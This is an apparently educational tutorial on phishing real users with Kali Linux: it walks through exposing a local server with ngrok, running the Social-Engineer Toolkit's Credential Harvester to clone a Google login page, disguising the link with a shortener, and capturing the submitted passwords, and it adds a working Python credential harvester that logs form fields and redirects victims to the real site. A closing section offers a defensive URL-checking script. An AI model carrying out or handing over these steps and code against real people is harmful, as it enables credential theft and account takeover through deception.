This article aims to serve as an educational guide to phishing a victim using tools present in Kali Linux alongside one small external tool.
Do not use these methods against anyone without explicit authorization; be aware of the legal and ethical consequences before you try any of this outside a lab. With all that said, let's begin.
Tools Required
- Kali Linux (any version should work; this tutorial uses 2020.2)
- Ngrok
- Setoolkit (the Social-Engineer Toolkit, preinstalled in the standard Kali images)
- Basic knowledge of the terminal
What is Ngrok and Setoolkit?
Ngrok is a cross-platform application that lets developers expose a local development server to the Internet with minimal effort. It opens a tunnel from a public ngrok hostname to a port on your machine, so a web server listening only locally becomes reachable from anywhere on the internet.
Setoolkit (the Social-Engineer Toolkit, SET) is a framework for carrying out various kinds of social engineering attacks. Rather than attacking software, it attacks the human element of the system we are trying to get into.
Installing Ngrok
- First, create an account at ngrok.com. You can sign up with an email address, GitHub or Google.
- Once you do so, you should be able to see something like this -
Since we are working on a Linux distribution, download the Linux .zip file and follow the setup steps shown in the image above, up to but not including “Fire it up”; we start ngrok ourselves in the next section.
Running Ngrok
Now we need to fire up Ngrok. To do this, change into the folder where you unzipped the archive and run the following command, which tunnels HTTP traffic to local port 80 -
./ngrok http 80
After doing so, you should be getting something like this -
As you can see, ngrok prints a public URL (a random subdomain of ngrok.io) that forwards to port 80 on our machine, along with a local web interface on http://127.0.0.1:4040 for inspecting the requests that pass through the tunnel. We are going to use these very servers to carry out a WAN attack (in layman's terms, an attack reachable by anyone in the world) via phishing. Note that nothing is listening on port 80 yet; the web server itself is started by setoolkit in the next stage. Now that we have a public tunnel, we can proceed to the phishing stage.
Phishing with Setoolkit
This tool is installed in Kali by default, so there is normally nothing to set up. Even if you don't have it, you can clone the official repository from GitHub and run the tool from there.
Since it is preinstalled on my system, all I need to do is run the following command for the tool's menu to appear. Run it as root (for example with sudo), since the harvester needs to bind port 80 -
setoolkit
Once we run the command, a text menu like this should appear -
As you can see, the first options are different categories of attack. Phishing is a social engineering attack, so we need to enter 1 at the “set>” prompt.
Once we do that, we get the following -
We are interested in using a website to bait a victim, so we shall select 2 here to get the list of options for our intended attack.
Thereby, we get -
Now we need to select 3 since our primary objective is to harvest credentials from our victim (usernames and passwords).
We can use any one of these options to carry out our attack. But to make our objective simple, we will just use 1 for Web Templates.
If you want to use any other site, you can simply enter the URL when you select the Site Cloner option.
As you can see, we are now prompted for the IP address (or hostname) that the cloned page should POST the credentials back to. Here we enter the public hostname we got from the running ngrok tunnel, without the https:// prefix. In my case it was 76dd7b71d657.ngrok.io. Entering this hostname makes the fake login form submit through the tunnel, so our local fake site is reachable on a public domain that anyone on the internet can open with a link.
Once you enter it, we get the list of templates for very popular login sites. In our example, we will just go for Google. For that, you just need to type 2 and press Enter.
Now once we do that, we have a server serving the bait. All we need to do is get our victim to open the ngrok URL. To make the URL look less suspicious, one could shorten the link with a service such as Bit.ly (Goo.gl no longer creates new links). For this guide, we shall just leave the URL as it is.
When we open the link in a web browser, we get a cloned copy of the Google login page -
I entered an email ID and password. Now we simply click Sign In and see if our tool was able to catch the credentials.
As we can see, the submitted credentials are printed in the setoolkit terminal, and the victim is sent on to the real login page, so from their side it just looks like a login that did not go through.
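To make the capture step concrete, here is a miniature credential harvester in Python. It is an added example written for this article, not code from setoolkit: a tiny HTTP server serves a fake login form, records whatever the browser POSTs, and then redirects the visitor to the real login page, which is the pattern the Credential Harvester follows. The form field names, the redirect target (assumed to be accounts.google.com) and the sample submission are all constructed for the demo, and everything runs on localhost.

```python
"""Miniature credential harvester (added example, not setoolkit's own code).

GET  /  -> serves a fake login form
POST /  -> records the submitted fields, then 302-redirects to the real site
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import HTTPRedirectHandler, Request, build_opener

# Where the victim is sent after submitting (assumed target for the demo).
REAL_LOGIN = "https://accounts.google.com/"

# A real clone is the target site's HTML with the form action rewritten to
# point back at the harvester (the "POST back" address setoolkit asks for).
# Field names here are constructed for the demo.
LOGIN_PAGE = b"""<html><body><form method="post" action="/">
<input name="email"><input name="password" type="password">
<input type="submit" value="Sign in"></form></body></html>"""


class Harvester(BaseHTTPRequestHandler):
    captured = []  # one dict per submitted form

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(LOGIN_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode()
        # parse_qs turns "email=a%40b&password=x" into {"email": ["a@b"], ...}
        fields = {k: v[0] for k, v in parse_qs(body).items()}
        Harvester.captured.append(fields)
        # Bounce the victim to the genuine site so the failed "login" looks
        # like a glitch rather than a phish.
        self.send_response(302)
        self.send_header("Location", REAL_LOGIN)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_harvester():
    """Bind an ephemeral localhost port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), Harvester)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


class NoRedirect(HTTPRedirectHandler):
    """Stop urllib following the 302 so the demo can inspect it instead."""

    def redirect_request(self, *args, **kwargs):
        return None


def run_demo():
    """Submit a constructed login and return (captured fields, redirect target)."""
    server = start_harvester()
    url = f"http://127.0.0.1:{server.server_port}/"
    data = urlencode({"email": "victim@example.com", "password": "hunter2"}).encode()
    opener = build_opener(NoRedirect)
    location = None
    try:
        opener.open(Request(url, data=data, method="POST"))
    except HTTPError as err:  # the 302 surfaces as an error because we refused to follow it
        location = err.headers["Location"]
    finally:
        server.shutdown()
        server.server_close()
    return Harvester.captured[-1], location


if __name__ == "__main__":
    fields, location = run_demo()
    print("captured:", fields)
    print("victim redirected to:", location)
```

Two things in this block are what a defender can look for: the form posts to a host that is not the site it imitates, and the very first response after submitting is a redirect to the genuine login page.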
Conclusion
If you have read through and/or followed this guide, you will have seen how simple it is to nab credentials without the victim becoming suspicious. Always check any URL you are prompted to open, especially when the page asks for your login details: a Google sign-in page served from a random ngrok.io subdomain is not Google.
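As an added example of the advice above (not part of the original guide), the following Python function applies the checks a careful reader would make on a link before typing credentials into it: is the host really under the expected domain, is there userinfo before an “@” disguising the host, is it a tunnel or shortener host, and is it HTTPS. The list of redirector suffixes and the sample links are constructed for the demo; 76dd7b71d657.ngrok.io is the tunnel hostname from this guide.

```python
"""Check a login link the way the conclusion advises (added example).

Given a URL and the domain the login page should live on, return the
reasons the link should not be trusted; an empty list means it passed.
"""
from urllib.parse import urlsplit

# Hosts that hide the real destination: tunnel services and URL shorteners.
# Assumed list for the demo; extend it for your environment.
REDIRECTOR_SUFFIXES = ("ngrok.io", "bit.ly", "goo.gl", "tinyurl.com")


def registrable_domain(host, depth=2):
    """Last `depth` labels of a hostname: accounts.google.com -> google.com.
    A production check should use the public suffix list (e.g. for co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-depth:])


def check_login_url(url, expected_domain):
    """Return a list of reasons `url` should not be trusted for a login on
    `expected_domain`; an empty list means these checks all passed."""
    reasons = []
    # Shortened or pasted links often omit the scheme; urlsplit would then
    # treat the host as a path, so supply one before parsing.
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.username is not None:
        # https://accounts.google.com@evil.example/ : everything before '@'
        # is userinfo, not the host. A classic lure.
        reasons.append(
            f"text '{parts.username}' before '@' is userinfo; real host is {host}"
        )
    if parts.scheme != "https":
        reasons.append("not https")
    if any(host == s or host.endswith("." + s) for s in REDIRECTOR_SUFFIXES):
        reasons.append(f"{host} is a tunnel/shortener host; expand the link first")
    if registrable_domain(host) != expected_domain.lower():
        reasons.append(f"host {host} is not under {expected_domain}")
    return reasons


if __name__ == "__main__":
    # Constructed sample links: the real page, the guide's tunnel URL, and
    # two common disguises.
    samples = [
        "https://accounts.google.com/signin",
        "http://76dd7b71d657.ngrok.io/",
        "https://accounts.google.com@76dd7b71d657.ngrok.io/",
        "https://google.com.evil.example/login",
        "bit.ly/3abcdef",
    ]
    for link in samples:
        problems = check_login_url(link, "google.com")
        print(link, "->", "OK" if not problems else "; ".join(problems))
```

The look-alike subdomain case (google.com.evil.example) is the one people miss most often: the string “google.com” is right there in the address bar, but the registrable domain is evil.example, which is why the check compares the domain rather than searching for a substring.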